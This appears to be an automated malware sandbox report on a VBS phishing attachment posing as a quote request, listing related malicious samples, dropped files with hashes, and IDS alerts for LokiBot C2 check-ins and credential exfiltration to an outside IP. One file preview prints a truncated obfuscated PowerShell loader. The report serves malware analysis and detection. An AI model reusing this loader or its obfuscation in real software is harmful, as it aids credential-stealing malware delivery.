                                                          Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          RFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          37f463bf4616ecd445d4a1937da06e19Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          F723838674.vbsGet hashmaliciousRemcosBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Roaming\188E93\31437F.exeDocumentos adjuntos.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              FAR.N#U00ba2430-24000993.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    RFQ-16042024-2_2403872952 .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      20220830_ProtecoPTE.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        Klkket.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          QOUTATION FORMS_220707-400.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            PEDIDO MILWAUKEE 00652024.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):69993
                                                                              Entropy (8bit):7.99584879649948
                                                                              Encrypted:true
                                                                              SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                              MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):330
                                                                              Entropy (8bit):3.236117150252365
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKC3VVlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:qlVlbkPlE99SNxAhUeVLVt
                                                                              MD5:FDB5F4ECA5DF77FACB9B0C15C1A8531D
                                                                              SHA1:547204E1F6F97EA0E43B711E40A1397EAEC70102
                                                                              SHA-256:4106A12BD48EDC6696D594725993109FF1F2F94F31773EE2E2A832D220E91E03
                                                                              SHA-512:E1EEE5EE22514F2E6FEA1D802AADF4CF0EF3E391CD6AC2BD943142FF4FF477CC4917196217C907607C1A85B28BD733951A9C3A3BFF93812D999B67A0D2D0C7BA
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:p...... ........Q......(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):11608
                                                                              Entropy (8bit):4.886255615007755
                                                                              Encrypted:false
                                                                              SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                              MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                              SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                              SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                              SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllulbnolz:NllUc
                                                                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:ASCII text, with very long lines (8395), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8395
                                                                              Entropy (8bit):5.165097562000307
                                                                              Encrypted:false
                                                                              SSDEEP:192:SUbEhx1LwBg7a0OjcHcE2A1i0zuE37hs6JlB3Hx4q1yUGXuKwsHa+sdzi:SUC1LGKlHcELNaECOB3ZuwT+sdzi
                                                                              MD5:39BD0D7206E702DED4C064C967C327DD
                                                                              SHA1:AACCE3246A207E4F958066B206A50D6507E2957F
                                                                              SHA-256:4F185FF98850DB64E2D133689865D1781E9779003A2C812C84E4BC8F1D53E117
                                                                              SHA-512:310DACF0B85D7EAE361E1E5C256E14CC7DB7A6E0847D0A1AF1D1E11452DA7AD82344ACC53A002BA1A8152EE4E8069F7139004EE8C95F65BC8718797B87DB19F7
                                                                              Malicious:true
                                                                              Preview:powershell "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Ski
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):516608
                                                                              Entropy (8bit):6.035530871194082
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                              MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                              SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                              SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                              SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: Documentos adjuntos.vbe, Detection: malicious, Browse
                                                                              • Filename: 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe, Detection: malicious, Browse
                                                                              • Filename: FAR.N#U00ba2430-24000993.vbe, Detection: malicious, Browse
                                                                              • Filename: justificante.vbe, Detection: malicious, Browse
                                                                              • Filename: Transferencia 4334300002017359pdf.vbe, Detection: malicious, Browse
                                                                              • Filename: RFQ-16042024-2_2403872952 .pdf.vbs, Detection: malicious, Browse
                                                                              • Filename: 20220830_ProtecoPTE.vbe, Detection: malicious, Browse
                                                                              • Filename: Klkket.vbe, Detection: malicious, Browse
                                                                              • Filename: QOUTATION FORMS_220707-400.vbs, Detection: malicious, Browse
                                                                              • Filename: PEDIDO MILWAUKEE 00652024.vbe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):47
                                                                              Entropy (8bit):1.168829563685559
                                                                              Encrypted:false
                                                                              SSDEEP:3:/lSll2DQi:AoMi
                                                                              MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                                                              SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                                                              SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                                                              SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                                                              Malicious:false
                                                                              Preview:........................................user.
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):474260
                                                                              Entropy (8bit):5.86266073725348
                                                                              Encrypted:false
                                                                              SSDEEP:12288:HQk9V7juXW4Zf0q7J/l7XE3ovPYBah2Lhc5kGQ8tL0:HD9V7ZgMq71l7U3ovwBahAhAkGQ8W
                                                                              MD5:EEF3F42F8568EC1D96E3FC1A3174C27F
                                                                              SHA1:B58F1FAE7AEB4F69389A46D62FB110C5BF0B39A2
                                                                              SHA-256:F87D719B62B1B6A582AE647B47DCB70855495C65307CC786EBAF1580A7F1628E
                                                                              SHA-512:F386755DB46E2454711107F92C6EBC47DBFB50D047DDC296304703223928F5A1E8A6156E05E1544E2FD9B07CF63A5FDF54A16CE3010F650670C828F8EE4D37DC
                                                                              Malicious:false
                                                                              Preview:6wJvDesCWa+7XhMaAHEBm3EBmwNcJATrArWUcQGbucqmzENxAZvrAqBXgfEhzRdgcQGbcQGbgenra9sj6wIIzXEBm3EBm+sCS6S6HsO/tOsCm+hxAZvrApdDcQGbMcrrAulmcQGbiRQLcQGb6wINrtHicQGb6wItkYPBBOsC3XfrAseHgfliz2wCfMrrAipHcQGbi0QkBHEBm3EBm4nD6wJWcesCfC6Bw1ARtwHrAkuzcQGbukk7k51xAZtxAZuB8hr2xQFxAZvrAsPfgcKtMqlj6wIYPesCqixxAZvrAq0k6wImFesC+hiLDBDrAg1I6wIGtYkME3EBm3EBm0LrAoBY6wJ4voH6SPgEAHXT6wK2cHEBm4lcJAzrAvjMcQGbge0AAwAA6wJw23EBm4tUJAjrAn/ScQGbi3wkBOsCYzTrArR4ievrArTfcQGbgcOcAAAAcQGbcQGbU3EBm3EBm2pAcQGb6wIBYInr6wKYIXEBm8eDAAEAAADwiQJxAZtxAZuBwwABAABxAZtxAZtTcQGbcQGbievrAr8WcQGbibsEAQAAcQGbcQGbgcMEAQAA6wIHF+sCGT9T6wJycusC151q/+sCkIfrAjB0g8IF6wLpX+sCPE8x9usCfmDrAq9fMclxAZvrAiwPixrrAr/K6wIB9kFxAZtxAZs5HAp19OsCpaVxAZtG6wKVG3EBm4B8Cvu4dd7rAqbj6wKKI4tECvxxAZvrAgBiKfBxAZtxAZv/0nEBm+sCj2+6SPgEAOsCNM1xAZsxwOsCFdXrAl3Fi3wkDOsCZNfrAmPegTQH63HkMXEBm3EBm4PABHEBm+sCx7M50HXlcQGbcQGbifvrAmsXcQGb/9frAk7S6wJ8bWuNBVduoIKwEJ4LuA7wCFyRd+GwLxyTN+4kbdRSKc/Hj/AVXKWd+LAa+xNrnPAlaIbOFMYovSzU4bagPOvNq+tY8JA86xolXVP1JbQg8JA867hJY4PwiDzrb8fViPAl
                                                                              File type:ASCII text, with CRLF line terminators
                                                                              Entropy (8bit):5.00413330253319
                                                                              TrID:
                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                              File name:Request for Proposal Quote_2414976#U00b7pdf.vbs
                                                                              File size:372'599 bytes
                                                                              MD5:4c0d5b830080aa8b72546a6d7f924aca
                                                                              SHA1:d061aa6f577e894eb58fd4bc64b366e2e7919630
                                                                              SHA256:56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
                                                                              SHA512:c87b174d0e027f6f85be7669e16b1430531f7880d507ebd1cec55f159fb71bf3ede586001c8a32424886e74dc3477b09d1108c133f75441575cf2d6c896d7d7d
                                                                              SSDEEP:6144:1qJLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPE:4uInOi5cI5E0k
                                                                              TLSH:A38427E3DAD526298A4A2AB7ED134B738DB4415C33131E78A3BCC65D604395C82BFBD4
                                                                              File Content Preview:..Rem rebring superchivalrousness occidentalise19 gangstolen aftgten; biz arrilds highbrowism; halvtredskroneseddels popmusik175; bevgelsesmngder..Rem Oenomel: bygrnsers tilstedevrende kritarchy...Rem Aulacodus kartoteksprogrammerne138 waleskringles clupe
                                                                              Icon Hash:68d69b8f86ab9a86
                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              04/18/24-21:15:47.546903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:43.577757TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:24.990290TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:47.546903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:03.069976TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:48.869530TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:39.649079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:04.601915TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.524.199.107.111
                                                                              04/18/24-21:14:55.405038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.524.199.107.111
                                                                              04/18/24-21:14:55.405038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:08.492047TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.524.199.107.111
                                                                              04/18/24-21:16:06.993244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:09.740290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.524.199.107.111
                                                                              04/18/24-21:16:06.993244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.524.199.107.111
                                                                              04/18/24-21:14:51.563444TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.524.199.107.111
                                                                              04/18/24-21:14:51.563444TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.524.199.107.111
                                                                              04/18/24-21:16:00.483740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:14.853773TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.524.199.107.111
                                                                              04/18/24-21:16:00.483740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:30.148760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:52.727351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:18.646857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:23.725040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:54.038795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.524.199.107.111
                                                                              04/18/24-21:14:52.788914TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:03.295987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:54.038795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:03.295987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:23.725040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:16.137495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.524.199.107.111
                                                                              04/18/24-21:14:56.706824TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:12.336916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.524.199.107.111
                                                                              04/18/24-21:14:58.054488TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:11.036801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.524.199.107.111
                                                                              04/18/24-21:14:56.706824TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:21.167396TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.524.199.107.111
                                                                              04/18/24-21:14:54.064385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:16.137495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:21.167396TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:01.992569TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:57.883313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:35.272659TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:55.291838TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:28.852627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:56.584321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:37.064330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:26.304472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:46.232170TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.524.199.107.111
                                                                              04/18/24-21:16:04.366648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:13.616364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.524.199.107.111
                                                                              04/18/24-21:16:04.366648TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:07.211883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:13.616364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:07.211883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:50.128905TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.524.199.107.111
